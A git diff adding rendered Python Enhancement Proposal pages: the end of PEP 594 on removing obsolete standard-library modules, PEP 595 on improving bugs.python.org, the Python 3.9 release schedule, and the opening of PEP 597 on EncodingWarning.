The sndhdr module is +similar to the imghdr module but for audio formats. It guesses file +format, channels, frame rate, and sample widths from the first 512 bytes of +a file or buffer. The module only supports AU, AIFF, HCOM, VOC, WAV, and +other ancient formats.

+
+
+

sunau

+

The sunau module provides +support for Sun AU sound format. It’s yet another old, obsolete file format.

+
+
+
+

Networking modules

+
+

asynchat

+

The asynchat module is built on top of +asyncore and has been deprecated since Python 3.6.

+
+
+

asyncore

+

The asyncore module was +the first module for asynchronous socket service clients and servers. It +has been replaced by asyncio and is deprecated since Python 3.6.

+

The asyncore module is also used in stdlib tests. The tests for +ftplib, logging, smptd, smtplib, and ssl are partly +based on asyncore. These tests must be updated to use asyncio or +threading.

+
+
+

cgi

+

The cgi module is a support +module for Common Gateway Interface (CGI) scripts. CGI is deemed as +inefficient because every incoming request is handled in a new process. +PEP 206 considers the module as:

+
+
“[…] designed poorly and are now near-impossible to fix (cgi) […]”
+

Replacements for the various parts of cgi which are not directly +related to executing code are:

+
    +
  • parse with urllib.parse.parse_qs (parse is just a wrapper)
  • +
  • parse_header with email.message.Message (see example below)
  • +
  • parse_multipart with email.message.Message (same MIME RFCs)
  • +
  • FieldStorage/MiniFieldStorage has no direct replacement, but can +typically be replaced by using multipart (for POST and PUT +requests) or urllib.parse.parse_qsl (for GET and HEAD +requests)
  • +
  • valid_boundary (undocumented) with re.compile("^[ -~]{0,200}[!-~]$")
  • +
+

As an explicit example of how close parse_header and +email.message.Message are:

+
>>> from cgi import parse_header
+>>> from email.message import Message
+>>> parse_header(h)
+('application/json', {'charset': 'utf8'})
+>>> m = Message()
+>>> m['content-type'] = h
+>>> m.get_params()
+[('application/json', ''), ('charset', 'utf8')]
+>>> m.get_param('charset')
+'utf8'
+
+
+
+
+

cgitb

+

The cgitb module is a +helper for the cgi module for configurable tracebacks.

+

The cgitb module is not used by any major Python web framework (Django, +Pyramid, Plone, Flask, CherryPy, or Bottle). Only Paste uses it in an +optional debugging middleware.

+
+
+

smtpd

+

The smtpd module provides +a simple implementation of a SMTP mail server. The module documentation +marks the module as deprecated and recommends aiosmtpd instead. The +deprecation message was added in releases 3.4.7, 3.5.4, and 3.6.1.

+
+
+

nntplib

+

The nntplib module +implements the client side of the Network News Transfer Protocol (nntp). News +groups used to be a dominant platform for online discussions. Over the last +two decades, news has been slowly but steadily replaced with mailing lists +and web-based discussion platforms. Twisted is also +planning to deprecate NNTP +support and pynntp hasn’t seen any +activity since 2014. This is a good indicator that the public interest in +NNTP support is declining.

+

The nntplib tests have been the cause of additional work in the recent +past. Python only contains the client side of NNTP, so the tests connect to +external news servers. The servers are sometimes unavailable, too slow, or do +not work correctly over IPv6. The situation causes flaky test runs on +buildbots.

+
+
+

telnetlib

+

The telnetlib module +provides a Telnet class that implements the Telnet protocol.

+
+
+
+

Operating system interface

+
+

crypt

+

The crypt module implements +password hashing based on the crypt(3) function from libcrypt or +libxcrypt on Unix-like platforms. The algorithms are mostly old, of poor +quality and insecure. Users are discouraged from using them.

+
    +
  • The module is not available on Windows. Cross-platform applications need +an alternative implementation anyway.
  • +
  • Only DES encryption is guaranteed to be available. DES has an extremely +limited key space of 2**56.
  • +
  • MD5, salted SHA256, salted SHA512, and Blowfish are optional extensions. +SSHA256 and SSHA512 are glibc extensions. Blowfish (bcrypt) is the only +algorithm that is still secure. However it’s in glibc and therefore not +commonly available on Linux.
  • +
  • Depending on the platform, the crypt module is not thread safe. Only +implementations with crypt_r(3) are thread safe.
  • +
  • The module was never useful to interact with system user and password +databases. On BSD, macOS, and Linux, all user authentication and +password modification operations must go through PAM (pluggable +authentication module); see the spwd deprecation.
  • +
+
+
+

nis

+

The nis module provides +NIS/YP support. Network Information Service / Yellow Pages is an old and +deprecated directory service protocol developed by Sun Microsystems. Its +designed successor NIS+ from 1992 never took off. For a long time, libc’s +Name Service Switch, LDAP, and Kerberos/GSSAPI have been considered a more powerful +and more secure replacement for NIS.

+
+
+

spwd

+

The spwd module provides +direct access to Unix shadow password database using non-standard APIs.

+

In general, it’s a bad idea to use spwd. It circumvents system +security policies, does not use the PAM stack, and is only compatible +with local user accounts, because it ignores NSS. The use of the spwd +module for access control must be considered a security bug, as it bypasses +PAM’s access control.

+

Furthermore, the spwd module uses the +shadow(3) APIs. +Functions like getspnam(3) access the /etc/shadow file directly. This +is dangerous and even forbidden for confined services on systems with a +security engine like SELinux or AppArmor.

+
+
+
+

Misc modules

+
+

mailcap

+

The mailcap package +reads mail capability files to assist in handling a file attachment in +an email. In most modern operating systems the email client itself handles reacting to +file attachments. Operating systems also have their own way to register +handling files by their file name extension. Finally, the module has +CVE-2015-20107 filed +against it while having no maintainer to help fix it.

+
+
+

msilib

+

The msilib package is a +Windows-only package. It supports the creation of Microsoft Installers (MSI). +The package also exposes additional APIs to create cabinet files (CAB). The +module is used to facilitate distutils to create MSI installers with the +bdist_msi command. In the past it was used to create CPython’s official +Windows installer, too.

+

Microsoft is slowly moving away from MSI in favor of Windows 10 Apps (AppX) +as a new deployment model [3].

+
+
+

pipes

+

The pipes module provides +helpers to pipe the input of one command into the output of another command. +The module is built on top of os.popen. Users are encouraged to use +the subprocess module instead.

+
+
+
+
+

Modules to keep

+

Some modules were originally proposed for deprecation but are no longer +listed as such in this PEP.

+ + +++++ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Table 2: Withdrawn deprecations
ModuleDeprecated inReplacement
colorsys-colormath, colour, colorspacious, Pillow
fileinput-argparse
getopt-argparse, optparse
optparse3.2argparse
wave-
+
+

colorsys

+

The colorsys module +defines color conversion functions between RGB, YIQ, HSL, and HSV coordinate +systems.

+

Walter Dörwald, Petr Viktorin, and others requested to keep colorsys. The +module is useful to convert CSS colors between coordinate systems. The +implementation is simple, mature, and does not impose maintenance overhead +on core development.

+

The PyPI packages colormath, colour, and colorspacious provide more and +advanced features. The Pillow library is better suited to transform images +between color systems.

+
+
+

fileinput

+

The fileinput module +implements helpers to iterate over a list of files from sys.argv. The +module predates the optparse and argparse modules. The same functionality +can be implemented with the argparse module.

+

Several core developers expressed their interest to keep the module in the +standard library, as it is handy for quick scripts.

+
+
+

getopt

+

The getopt module mimics +C’s getopt() option parser.

+

Although users are encouraged to use argparse instead, the getopt module is +still widely used. The module is small, simple, and handy for C developers +to write simple Python scripts.

+
+
+

optparse

+

The optparse module is +the predecessor of the argparse module.

+

Although it has been deprecated for many years, it’s still too widely used +to remove it.

+
+
+

wave

+

The wave module provides +support for the WAV sound format.

+

The module is not deprecated, because the WAV format is still relevant these +days. The wave module is also used in education, e.g. to show kids how +to make noise with a computer.

+

The module uses one simple function from the audioop module to perform +byte swapping between little and big endian formats. Before 24 bit WAV +support was added, byte swap used to be implemented with the array +module. To remove wave’s dependency on audioop, the byte swap +function could be either be moved to another module (e.g. operator) or +the array module could gain support for 24-bit (3-byte) arrays.

+
+
+
+

Discussions

+
    +
  • Elana Hashman and Alyssa Coghlan suggested to keep the getopt module.
  • +
  • Berker Peksag proposed to deprecate and remove msilib.
  • +
  • Brett Cannon recommended to delay active deprecation warnings and removal +of modules like imp until Python 3.10. Version 3.8 will be released +shortly before Python 2 reaches end-of-life. A delay reduced churn for +users that migrate from Python 2 to 3.8.
  • +
  • At one point, distutils was mentioned in the same sentence as this PEP. +To avoid lengthy discussion and delay of the PEP, I decided against dealing +with distutils. Deprecation of the distutils package will be handled by +another PEP.
  • +
  • Multiple people (Gregory P. Smith, David Beazley, Alyssa Coghlan, …) +convinced me to keep the wave module. [4]
  • +
  • Gregory P. Smith proposed to deprecate nntplib. [4]
  • +
  • Andrew Svetlov mentioned the socketserver module is questionable. +However it’s used to implement http.server and xmlrpc.server. The +stdlib doesn’t have a replacement for the servers, yet.
  • +
+
+
+

Rejected ideas

+
+

Creating/maintaining a separate repo for the deprecated modules

+

It was previously proposed to create a separate repository containing the +deprecated modules packaged for installation. One of the PEP authors went so far +as to create a demo repository. In the +end, though, it was decided that the added workload to create and maintain such +a repo officially wasn’t justified, as the source code will continue to be +available in the CPython repository for people to vendor as necessary. Similar +work has also not been done when previous modules were deprecated and removed, +and it seemingly wasn’t an undue burden on the community.

+
+
+
+

Update history

+
+

Update 1

+
    +
  • Deprecate parser module
  • +
  • Keep fileinput module
  • +
  • Elaborate why crypt and spwd are dangerous and bad
  • +
  • Improve sections for cgitb, colorsys, nntplib, and smtpd modules
  • +
  • The colorsys, crypt, imghdr, sndhdr, and spwd sections now +list suitable substitutions
  • +
  • Mention that socketserver is going to stay for http.server and +xmlrpc.server
  • +
  • The future maintenance section now states that the deprecated modules +may be adopted by Python community members
  • +
+
+
+

Update 2

+
    +
  • Keep colorsys module
  • +
  • Add experts
  • +
  • Redirect discussions to discuss.python.org
  • +
  • Deprecate telnetlib
  • +
  • Deprecate compat32 policy of email package
  • +
  • Add creation year to overview table
  • +
  • Mention PEP 206 and PEP 3108
  • +
  • Update sections for aifc, audioop, cgi, and wave.
  • +
+
+
+

Update 3

+
    +
  • Keep the legacy email API modules. Internal deprecations will be +handled separately.
  • +
+
+
+

Update 4

+
    +
  • Add Brett as a co-author.
  • +
  • Retarget the PEP for Python 3.11.
  • +
  • Examples of how to replace the relevant parts of cgi +(thanks Martijn Pieters).
  • +
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0594.rst

+

Last modified: 2024-05-25 13:48:58 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0595/index.html b/pep-0595/index.html new file mode 100644 index 00000000000..e37df74abcd --- /dev/null +++ b/pep-0595/index.html @@ -0,0 +1,501 @@ + + + + + + + + PEP 595 – Improving bugs.python.org | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 595 – Improving bugs.python.org

+
+
Author:
+
Ezio Melotti <ezio.melotti at gmail.com>, Berker Peksag <berker.peksag at gmail.com>
+
BDFL-Delegate:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Created:
+
12-May-2019
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a list of improvements to make bugs.python.org +more usable for contributors and core developers. This PEP also +discusses why remaining on Roundup should be preferred over +switching to GitHub Issues, as proposed by PEP 581.

+
+
+

Resolution

+

2020-06-25: With the acceptance of PEP 581, the move to GitHub for +issues is proceeding, this PEP is being marked as a withdrawn +informational PEP.

+
+
+

Motivation

+

On May 14th, 2019 PEP 581 has been accepted +without much public discussion and without a clear consensus. +The PEP contains factual errors and doesn’t address some of the +issues that the migration to GitHub Issues might present.

+

Given the scope of the migration, the amount of work required, +and how it will negatively affect the workflow during the +transition phase, this decision should be re-evaluated.

+
+
+

Roundup advantages over GitHub Issues

+

This section discusses reasons why Roundup should be preferred +over GitHub Issues and Roundup features that are not available +on GitHub Issues.

+
    +
  • Roundup is the status quo. Roundup has been an integral +part of the CPython workflow for years. It is a stable product +that has been tested and customized to adapt to our needs as the +workflow evolved.

    It is possible to gradually improve it and avoid the disruption +that a switch to a different system would inevitably bring to +the workflow.

    +
  • +
  • Open-source and Python powered. Roundup is an open-source +project and is written in Python. By using it and supporting +it, we also support the Python ecosystem. Several features +developed for bpo have also been ported to upstream Roundup +over the years.
  • +
  • Fully customizable. Roundup can be (and has been) fully +customized to fit our needs.
  • +
  • Finer-grained access control. Roundup allows the creation +of different roles with different permissions (e.g. create, +view, edit, etc.) for each individual property, and users can +have multiple roles.
  • +
  • Flexible UI. While Roundup UI might look dated, it is +convenient and flexible.

    For example, on the issue page, each field (e.g. title, type, +versions, status, linked files and PRs, etc.) have appropriate +UI elements (input boxes, dropdowns, tables, etc.) that are +easy to set and also provide a convenient way to get info about +the issue at a glance. The number of fields, their values, and +the UI element they use is also fully customizable. +GitHub only provides labels.

    +

    The issue list page presents the issues in a compact and easy +to read table with separate columns for different fields. For +comparison, Roundup lists 50 issues in a screen, whereas GitHub +takes two screens to shows 25 issues.

    +
  • +
  • Advanced search. Roundup provides an accurate way to search +and filter by using any combination of issue fields. +It is also possible to customize the number of results and the +fields displayed in the table, and the sorting and grouping +(up to two levels).

    bpo also provides predefined summaries (e.g. “Created by you”, +“Assigned to you”, etc.) and allows the creation of custom +search queries that can be conveniently accessed from the sidebar.

    +
  • +
  • Nosy list autocomplete. The nosy list has an autocomplete +feature that suggests maintainers and experts. The suggestions +are automatically updated when the experts index changes.
  • +
  • Dependencies and Superseders. Roundup allows to specify +dependencies that must be addressed before the current issues +can be closed and a superseder issue to easily mark duplicates +(for example, bpo-12078). +The list of dependencies can also be used to create +meta-issues that references several other sub-issues +(for example, bpo-26865).
  • +
+
+
+

Improving Roundup

+

This section lists some of the issues mentioned by PEP 581 +and other desired features and discusses how they can be implemented +by improving Roundup and/or our instance.

+
    +
  • REST API support. A REST API will make integration with other +services and the development of new tools and applications easier.

    Upstream Roundup now supports a REST API. Updating the tracker will +make the REST API available.

    +
  • +
  • GitHub login support. This will allow users to login +to bugs.python.org (bpo) without having to create a new account. +It will also solve issues with confirmation emails being marked +as spam, and provide two-factor authentication.

    A patch to add this functionality is already available +and is being integrated at the time of writing.

    +
  • +
  • Markdown support and message preview and editing. This feature +will allow the use of Markdown in messages and the ability to +preview the message before the submission and edit it afterward.

    This can be done, but it will take some work. Possible solutions +have been proposed on the roundup-devel mailing list.

    +
  • +
  • “Remove me from nosy list” button. Add a button on issue pages +to remove self from the nosy list.

    This feature will be added during GSoC 2019.

    +
  • +
  • Mobile friendly theme. Current theme of bugs.python.org looks +dated and it doesn’t work well with mobile browsers.

    A mobile-friendly theme that is more modern but still familiar +will be added.

    +
  • +
  • Move reply box close to the last message. The reply box is +located at the top of the page, whereas the last message is at the +bottom.

    The reply box can be moved or duplicated after the last message.

    +
  • +
  • Real-time updates. When another users submits changes to an +issue, they should show up in real time.

    This can be accomplished by using the REST API.

    +
  • +
  • Add PR link to BPO emails. Currently bpo emails don’t include +links to the corresponding PRs.

    A patch +is available to change the content of the bpo emails from:

    +
    components: +Tkinter
    +versions: +Python 3.4
    +pull_requests: +42
    +
    +
    +

    to:

    +
    components: +Tkinter
    +versions: +Python 3.4
    +pull_request: https://github.com/python/cpython/pull/341
    +
    +
    +
  • +
  • Python 3 support. Using Python 3 will make maintenance easier.

    Upstream Roundup now supports Python 3. Updating the tracker will +allow us to switch to Python 3. The instances will need to be +updated as well.

    +
  • +
  • Use upstream Roundup. We currently use a fork of Roundup with +a few modifications, most notably the GitHub integration. If this +is ported upstream, we can start using upstream Roundup without +having to maintain our fork.
  • +
+
+
+

PEP 581 issues

+

This section addresses some errors and inaccuracies found in PEP 581.

+

The “Why GitHub?” section of PEP 581 lists features currently +available on GitHub Issues but not on Roundup. Some of this features +are currently supported:

+
    +
  • “Ability to reply to issue and pull request conversations via email.”
      +
    • Being able to reply by email has been one of the core features of +Roundup since the beginning. It is also possible to create new +issues or close existing ones, set or modify fields, and add +attachments.
    • +
    +
  • +
  • “Email notifications containing metadata, integrated with Gmail, +allowing systematic filtering of emails.”
      +
    • Emails sent by Roundup contains metadata that can be used for +filtering.
    • +
    +
  • +
  • “Additional privacy, such as offering the user a choice to hide an +email address, while still allowing communication with the user +through @-mentions.”
      +
    • Email addresses are hidden by default to users that are not +registered. Registered users can see other users’ addresses +because we configured the tracker to show them. It can easily +be changed if desired. Users can still be added to the nosy +list by using their username even if their address is hidden.
    • +
    +
  • +
  • “Ability to automatically close issues when a PR has been merged.”
      +
    • The GitHub integration of Roundup automatically closes issues +when a commit that contains “fixes issue <id>” is merged. +(Alternative spellings such as “closes” or “bug” are also supported.) +See this message +for a recent example of this feature.
    • +
    +
  • +
  • “Support for permalinks, allowing easy quoting and copying & +pasting of source code.”
      +
    • Roundup has permalinks for issues, messages, attachments, etc. +In addition, Roundup allows to easily rewrite broken URLs in +messages (e.g. if the code hosting changes).
    • +
    +
  • +
  • “Core developers, volunteers, and the PSF don’t have to maintain the +issue infrastructure/site, giving us more time and resources to focus +on the development of Python.”
      +
    • While this is partially true, additional resources are required to +write and maintain bots.

      In some cases, bots are required to workaround GitHub’s lack of +features rather than expanding. This webhook +was written specifically to workaround GitHub’s email integration.

      +

      Updating our bots to stay up-to-date with changes in the GitHub API +has also maintenance cost. This recent incident caused by GitHub +took two days to be fixed.

      +

      In addition, we will still need to maintain Roundup for bpo (even +if it becomes read-only) and for the other trackers +we currently host/maintain (Jython +and Roundup).

      +
    • +
    +
  • +
+

The “Issues with Roundup / bpo” section of PEP 581 lists some issues +that have already been fixed:

+
    +
  • “The upstream Roundup code is in Mercurial. Without any CI available, +it puts heavy burden on the few existing maintainers in terms of +reviewing, testing, and applying patches.” +
  • +
  • “There is no REST API available. There is an open issue in Roundup for +adding REST API. Last activity was in 2016.”
      +
    • The REST API has been integrated and it’s now available in Roundup.
    • +
    +
  • +
  • “Users email addresses are exposed. There is no option to mask it.”
      +
    • Exposing addresses to registered and logged in users was a decision +taken when our instance was set up.

      This has now been changed to make the email addresses hidden for +regular users too (Developers and Coordinators can still see them). +The “Email address” column from the user listing page has been +removed too.

      +
    • +
    +
  • +
  • “It sends a number of unnecessary emails and notifications, and it is +difficult, if not impossible, to configure.”
      +
    • This can be configured.
    • +
    +
  • +
  • “Creating an account has been a hassle. There have been reports of people +having trouble creating accounts or logging in.”
      +
    • The main issue is confirmation emails being marked as spam. Work has +been done to resolve the issue.
    • +
    +
  • +
+
+
+

Migration considerations

+

This section describes issues with the migrations that might not +have been addressed by PEP 581 and PEP 588.

+

PEP 588 suggests to add a button to migrate issues to GitHub +only when someone wants to keep working on them. This approach +has several issues, but there are also other issues that will +need to be addressed regardless of the approach used:

+
    +
  • Vendor lock-in. GitHub is proprietary and there is risk +of vendor lock-in. Their business model might change and they +could shut down altogether. For example, several projects +decided to move away from GitHub after Microsoft acquisition.

    If/when the repository is no longer available on GitHub, we will +be forced to migrate again and all the links to the issues won’t +work anymore.

    +
  • +
  • Required bpo updates. bpo will need to be updated in order +to add a button that, once pressed, creates a new issue on +GitHub, copies over all the messages, attachments, and +creates/adds labels for the existing fields. Permissions will +also need to be tweaked to make individual issues read-only +once they are migrated, and to prevent users to create new +accounts. It might be necessary to set up redirects (see below).
  • +
  • Two trackers. If issues are migrated on demand, the issues +will be split between two trackers. Referencing and searching +issues will take significant more effort.
  • +
  • Lossy conversion. GitHub only mechanism to add custom metadata +is through labels. bpo uses a number of fields to specify several +different metadata. Preserving all fields and values will result +in too many labels. If only some fields and values are preserved +the others will be lost (unless there is a way to preserve them +elsewhere).
  • +
  • Issue IDs preservation. GitHub doesn’t provide a way to +set and preserve the ID of migrated issues. Some projects managed +to preserve the IDs by contacting the GitHub staff and migrating +the issues en masse. However, this is no longer possible, since +PRs and issues share the same namespace and PRs already use +existing bpo issue IDs.
  • +
  • Internal issue links preservation. Existing issues might +contain references to other issues in messages and fields (e.g. +dependencies or superseder). Since the issue ID will change +during the migration, these will need to be updated. If the +issues are migrated on demand, all the existing internal +references to the migrated issues (on both bpo and GitHub issues) +will have to be updated.

    Setting up a redirect for each migrated issue on bpo might +mitigate the issue, however – if references in migrated messages +are not updated – it will cause confusion (e.g. if bpo issue +#1234 becomes GitHub issue #4321, a reference to #1234 +in a migrated message could link to bpo #1234 and bpo can +redirect to GitHub issue #4321, but new references to #1234 +will link to GitHub PR #1234 rather than GitHub issue #4321). +Manually having to specify a bpo- or gh- prefix is error prone.

    +
  • +
  • External issue links preservation. A number of websites, +mails, etc. link to bpo issues. If bpo is shut down, these links +will break. If we don’t want to break the links, we will have to +keep bpo alive and set up a redirect system that links to the +corresponding GitHub issue.

    In addition, if GitHub shuts down, we won’t have any way to setup +redirects and preserve external links to GitHub issues.

    +
  • +
  • References preservation and updating. In addition to issue +references, bpo converts a number of other references into links, +including message and PR IDs, changeset numbers, legacy SVN +revision numbers, paths to files in the repo, files in tracebacks +(detecting the correct branch), and links to devguide pages and +sections.

    Since Roundup converts references to links when messages are +requested, it is possible to update the target and generate the +correct link. This need already arose several times, for +example: files and HG changesets moved from hg.python.org to +GitHub and the devguide moved from docs.python.org/devguide to +devguide.python.org.

    +

    Since messages on GitHub are static, the links will need to be +generated and hardcoded during the migration or they will be lost. +In order to update them, a tool to find all references and +regenerate the links will need to be written.

    +
  • +
  • Roundup and bpo maintenance. On top of the aforementioned +changes to bpo and development of tools required to migrate to +GitHub issues, we will still need to keep running and maintaining +Roundup, both for our bpo instance (read-only) and for the Jython +and Roundup trackers (read-write).

    Even if eventually we migrate all bpo issues to GitHub and we stop +maintaining Jython and Roundup, bpo will need to be maintained +and redirect to the corresponding GitHub issues.

    +
  • +
  • Bots maintenance. Since it’s not possible to customize GitHub +directly, it’s also necessary to write, maintain, and host bots. +Even if eventually we stop maintaining Roundup, the maintenance +burden simply shifted from Roundup to the bots. Hosting each +different bot also has a monetary cost.
  • +
  • Using issue templates. Manually editing issue templates to +“remove texts that don’t apply to [the] issue” is cumbersome and +error-prone.
  • +
  • Signal to noise ratio. Switching to GitHub Issues will +likely increase the number of invalid reports and increase +the triaging effort. This concern has been raised in the past +in a Zulip topic.

    There have been already cases where people posted comments on +PRs that required moderators to mark them as off-topic or +disruptive, delete them altogether, and even lock the +conversation (for example, this PR.

    +
  • +
  • Weekly tracker reports and stats. Roundup sends weekly reports +to python-dev with a summary that includes new issues, recent +issues with no replies, recent issues waiting for review, most +discussed issues, closed issues, and deltas for open/closed/total +issue counts (for example, see this summary). +The report provides an easy way to keep track +of the tracker activity and to make sure that issues that require +attention are noticed.

    The data collect by the weekly report is also used to generate +statistics and graphs +that can be used to gain new insights.

    +
  • +
  • bpo-related MLs. There are currently two mailing lists where +bpo posts new tracker issues and all messages respectively: +new-bugs-announce +and python-bugs-list. +A new system will need to be developed to preserve this functionality. These MLs +offer additional ways to keep track of the tracker activity.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0595.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0596/index.html b/pep-0596/index.html new file mode 100644 index 00000000000..9424a8273d4 --- /dev/null +++ b/pep-0596/index.html @@ -0,0 +1,253 @@ + + + + + + + + PEP 596 – Python 3.9 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 596 – Python 3.9 Release Schedule

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
04-Jun-2019
+
Python-Version:
+
3.9
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.9. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.9 Release Manager: Łukasz Langa
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

Release Schedule

+
+

3.9.0 schedule

+

Note: the dates below use a 17-month development period that results +in a 12-month release cadence between feature versions, as defined by +PEP 602.

+

Actual:

+
    +
  • 3.9 development begins: Tuesday, 2019-06-04
  • +
  • 3.9.0 alpha 1: Tuesday, 2019-11-19
  • +
  • 3.9.0 alpha 2: Wednesday, 2019-12-18
  • +
  • 3.9.0 alpha 3: Saturday, 2020-01-25
  • +
  • 3.9.0 alpha 4: Wednesday, 2020-02-26
  • +
  • 3.9.0 alpha 5: Monday, 2020-03-23
  • +
  • 3.9.0 alpha 6: Tuesday, 2020-04-28
  • +
  • 3.9.0 beta 1: Monday, 2020-05-18 +(No new features beyond this point.)
  • +
  • 3.9.0 beta 3: Tuesday, 2020-06-09 +(beta 2 was recalled.)
  • +
  • 3.9.0 beta 4: Friday, 2020-07-03
  • +
  • 3.9.0 beta 5: Monday, 2020-07-20
  • +
  • 3.9.0 candidate 1: Tuesday, 2020-08-11
  • +
  • 3.9.0 candidate 2: Thursday, 2020-09-17
  • +
  • 3.9.0 final: Monday, 2020-10-05
  • +
+
+
+

Bugfix releases

+

Actual:

+
    +
  • 3.9.1 candidate 1: Tuesday, 2020-11-24
  • +
  • 3.9.1 final: Monday, 2020-12-07
  • +
  • 3.9.2 candidate 1: Tuesday, 2021-02-16
  • +
  • 3.9.2 final: Friday, 2021-02-19
  • +
  • 3.9.3: Friday, 2021-04-02 (security hotfix; recalled due to bpo-43710)
  • +
  • 3.9.4: Sunday, 2021-04-04 (ABI compatibility hotfix)
  • +
  • 3.9.5: Monday, 2021-05-03
  • +
  • 3.9.6: Monday, 2021-06-28
  • +
  • 3.9.7: Monday, 2021-08-30
  • +
  • 3.9.8: Friday, 2021-11-05 (recalled due to bpo-45235)
  • +
  • 3.9.9: Monday, 2021-11-15
  • +
  • 3.9.10: Friday, 2022-01-14
  • +
  • 3.9.11: Wednesday, 2022-03-16
  • +
  • 3.9.12: Wednesday, 2022-03-23
  • +
  • 3.9.13: Tuesday, 2022-05-17 (final regular bugfix release with binary +installers)
  • +
+
+
+

Source-only security fix releases

+

Provided irregularly on an “as-needed” basis until October 2025.

+
    +
  • 3.9.14: Tuesday, 2022-09-06
  • +
  • 3.9.15: Tuesday, 2022-10-11
  • +
  • 3.9.16: Tuesday, 2022-12-06
  • +
  • 3.9.17: Tuesday, 2023-06-06
  • +
  • 3.9.18: Thursday, 2023-08-24
  • +
  • 3.9.19: Tuesday, 2024-03-19
  • +
  • 3.9.20: Friday, 2024-09-06
  • +
  • 3.9.21: Tuesday, 2024-12-03
  • +
+
+
+

3.9 Lifespan

+

3.9 will receive bugfix updates approximately every 2 months for +approximately 18 months. Some time after the release of 3.10.0 final, +the ninth and final 3.9 bugfix update will be released. After that, +it is expected that security updates (source only) will be released +until 5 years after the release of 3.9 final, so until approximately +October 2025.

+
+
+
+

Features for 3.9

+

Implemented PEPs for 3.9:

+
    +
  • PEP 573, Module State Access from C Extension Methods
  • +
  • PEP 584, Add Union Operators To dict
  • +
  • PEP 585, Type Hinting Generics In Standard Collections
  • +
  • PEP 593, Flexible function and variable annotations
  • +
  • PEP 614, Relaxing Grammar Restrictions On Decorators
  • +
  • PEP 615, Support for the IANA Time Zone Database in the Standard Library
  • +
  • PEP 616, String methods to remove prefixes and suffixes
  • +
  • PEP 617, New PEG parser for CPython
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0596.rst

+

Last modified: 2024-12-05 19:08:36 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0597/index.html b/pep-0597/index.html new file mode 100644 index 00000000000..2da4d761aad --- /dev/null +++ b/pep-0597/index.html @@ -0,0 +1,464 @@ + + + + + + + + PEP 597 – Add optional EncodingWarning | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 597 – Add optional EncodingWarning

+
+
Author:
+
Inada Naoki <songofacandy at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-Jun-2019
+
Python-Version:
+
3.10
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add a new warning category EncodingWarning. It is emitted when the +encoding argument to open() is omitted and the default +locale-specific encoding is used.

+

The warning is disabled by default. A new -X warn_default_encoding +command-line option and a new PYTHONWARNDEFAULTENCODING environment +variable can be used to enable it.

+

A "locale" argument value for encoding is added too. It +explicitly specifies that the locale encoding should be used, silencing +the warning.

+
+
+

Motivation

+
+

Using the default encoding is a common mistake

+

Developers using macOS or Linux may forget that the default encoding +is not always UTF-8.

+

For example, using long_description = open("README.md").read() in +setup.py is a common mistake. Many Windows users cannot install +such packages if there is at least one non-ASCII character +(e.g. emoji, author names, copyright symbols, and the like) +in their UTF-8-encoded README.md file.

+

Of the 4000 most downloaded packages from PyPI, 489 use non-ASCII +characters in their README, and 82 fail to install from source on +non-UTF-8 locales due to not specifying an encoding for a non-ASCII +file. [1]

+

Another example is logging.basicConfig(filename="log.txt"). +Some users might expect it to use UTF-8 by default, but the locale +encoding is actually what is used. [2]

+

Even Python experts may assume that the default encoding is UTF-8. +This creates bugs that only happen on Windows; see [3], [4], [5], +and [6] for example.

+

Emitting a warning when the encoding argument is omitted will help +find such mistakes.

+
+
+

Explicit way to use locale-specific encoding

+

open(filename) isn’t explicit about which encoding is expected:

+
    +
  • If ASCII is assumed, this isn’t a bug, but may result in decreased +performance on Windows, particularly with non-Latin-1 locale encodings
  • +
  • If UTF-8 is assumed, this may be a bug or a platform-specific script
  • +
  • If the locale encoding is assumed, the behavior is as expected +(but could change if future versions of Python modify the default)
  • +
+

From this point of view, open(filename) is not readable code.

+

encoding=locale.getpreferredencoding(False) can be used to +specify the locale encoding explicitly, but it is too long and easy +to misuse (e.g. one can forget to pass False as its argument).

+

This PEP provides an explicit way to specify the locale encoding.

+
+
+

Prepare to change the default encoding to UTF-8

+

Since UTF-8 has become the de-facto standard text encoding, +we might default to it for opening files in the future.

+

However, such a change will affect many applications and libraries. +If we start emitting DeprecationWarning everywhere the encoding +argument is omitted, it will be too noisy and painful.

+

Although this PEP doesn’t propose changing the default encoding, +it will help enable that change by:

+
    +
  • Reducing the number of omitted encoding arguments in libraries +before we start emitting a DeprecationWarning by default.
  • +
  • Allowing users to pass encoding="locale" to suppress +the current warning and any DeprecationWarning added in the future, +as well as retaining consistent behavior if later Python versions +change the default, ensuring support for any Python version >=3.10.
  • +
+
+
+
+

Specification

+
+

EncodingWarning

+

